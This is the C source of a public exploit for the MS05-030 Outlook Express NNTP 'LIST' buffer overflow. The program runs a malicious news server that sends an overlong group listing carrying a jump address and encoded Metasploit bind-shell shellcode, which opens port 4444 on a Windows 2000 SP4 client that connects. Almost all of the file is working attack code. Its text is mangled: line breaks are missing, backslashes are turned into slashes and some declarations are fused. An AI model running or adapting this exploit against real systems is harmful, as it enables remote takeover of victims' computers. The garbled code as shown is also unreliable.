MS05-030-NNTP.c

#include <winsock2.h>#include <windows.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib,"ws2_32")/* win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */unsigned char scode[] ="/x31/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x96""/x27/xc8/x3e/x83/xeb/xfc/xe2/xf4/x6a/x4d/x23/x73/x7e/xde/x37/xc1""/x69/x47/x43/x52/xb2/x03/x43/x7b/xaa/xac/xb4/x3b/xee/x26/x27/xb5""/xd9/x3f/x43/x61/xb6/x26/x23/x77/x1d/x13/x43/x3f/x78/x16/x08/xa7""/x3a/xa3/x08/x4a/x91/xe6/x02/x33/x97/xe5/x23/xca/xad/x73/xec/x16""/xe3/xc2/x43/x61/xb2/x26/x23/x58/x1d/x2b/x83/xb5/xc9/x3b/xc9/xd5""/x95/x0b/x43/xb7/xfa/x03/xd4/x5f/x55/x16/x13/x5a/x1d/x64/xf8/xb5""/xd6/x2b/x43/x4e/x8a/x8a/x43/x7e/x9e/x79/xa0/xb0/xd8/x29/x24/x6e""/x69/xf1/xae/x6d/xf0/x4f/xfb/x0c/xfe/x50/xbb/x0c/xc9/x73/x37/xee""/xfe/xec/x25/xc2/xad/x77/x37/xe8/xc9/xae/x2d/x58/x17/xca/xc0/x3c""/xc3/x4d/xca/xc1/x46/x4f/x11/x37/x63/x8a/x9f/xc1/x40/x74/x9b/x6d""/xc5/x74/x8b/x6d/xd5/x74/x37/xee/xf0/x4f/xd9/x62/xf0/x74/x41/xdf""/x03/x4f/x6c/x24/xe6/xe0/x9f/xc1/x40/x4d/xd8/x6f/xc3/xd8/x18/x56""/x32/x8a/xe6/xd7/xc1/xd8/x1e/x6d/xc3/xd8/x18/x56/x73/x6e/x4e/x77""/xc1/xd8/x1e/x6e/xc2/x73/x9d/xc1/x46/xb4/xa0/xd9/xef/xe1/xb1/x69""/x69/xf1/x9d/xc1/x46/x41/xa2/x5a/xf0/x4f/xab/x53/x1f/xc2/xa2/x6e""/xcf/x0e/x04/xb7/x71/x4d/x8c/xb7/x74/x16/x08/xcd/x3c/xd9/x8a/x13""/x68/x65/xe4/xad/x1b/x5d/xf0/x95/x3d/x8c/xa0/x4c/x68/x94/xde/xc1""/xe3/x63/x37/xe8/xcd/x70/x9a/x6f/xc7/x76/xa2/x3f/xc7/x76/x9d/x6f""/x69/xf7/xa0/x93/x4f/x22/x06/x6d/x69/xf1/xa2/xc1/x69/x10/x37/xee""/x1d/x70/x34/xbd/x52/x43/x37/xe8/xc4/xd8/x18/x56/xe8/xff/x2a/x4d""/xc5/xd8/x1e/xc1/x46/x27/xc8/x3e";struct{DWORDdwJMPEBX;char*szDescription;}targets[] = {{0x7803382b, "win2k sp4 all language"}},v;void usage(char *p){inti;printf( "Usage: %s <type>/n""[type]/n", p);for(i=0;i<sizeof(targets)/sizeof(v);i++){printf("%d/t%s/n", i, targets[i].szDescription);}}void main(int argc, char **argv){struct sockaddr_in server,client;WSADATAwsd;SOCKETs2,s3;intret;charszRecvBuff[0x100];charszSend[] = "200/r/n";inti,iType;charszEvil[0x3000], szTmp[0x10];printf("MS OE NNTP /"LIST/" Buffer Overflow (MS05-030) EXP/n""Credits: Bug found by iDEFENSE/n""coded by eyas < eyas at xfocus.org>/n""http://www.xfocus.net/n/n");if(argc!=2){usage(argv[0]);return;}iType = atoi(argv[1]);if (WSAStartup(MAKEWORD(1,1), &wsd) != 0){printf("[-] WSAStartup error:%d/n", WSAGetLastError());return;}s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);server.sin_family = AF_INET;server.sin_port = htons(119);server.sin_addr.s_addr= 0;ret = bind(s2, (struct sockaddr *)&server, sizeof(server));ret = listen(s2, 100);printf("[+] Listen on TCP 119./n");while(1){ret=sizeof(client);s3 = accept(s2, (struct sockaddr *)&client, &ret);printf("[+] Connection accepted from %s:%d/n", inet_ntoa(client.sin_addr), ntohs(client.sin_port));printf("[+] Send welcome information./n");send(s3, szSend, strlen(szSend), 0);ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);szRecvBuff[ret-1] = '/x0';printf("[+] Recv: [%s]/n", szRecvBuff);send(s3, szSend, strlen(szSend), 0);printf("[+] Send response./n");ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);szRecvBuff[ret-4] = '/x0';printf("[+] Recv: [%s]/n", szRecvBuff);printf("[+] send evil buff./n");strcpy(szTmp, "/xEB/x06/xEB/x06");memcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4);szTmp[8]='/x0';strcpy(szEvil, "215 list/r/ngroup aaaa");//for(i=0;i<0x2598;i++)//for(i=0;i<0x30;i++)for(i=0;i<0x2598+0x200;i+=8)strcat(szEvil, szTmp);strcat(szEvil, (char *)scode);strcat(szEvil, " 1 y/r/n./r/n");send(s3, szEvil, strlen(szEvil), 0);Sleep(1000);closesocket(s3);printf("[+] close connection/n");}WSACleanup();return;}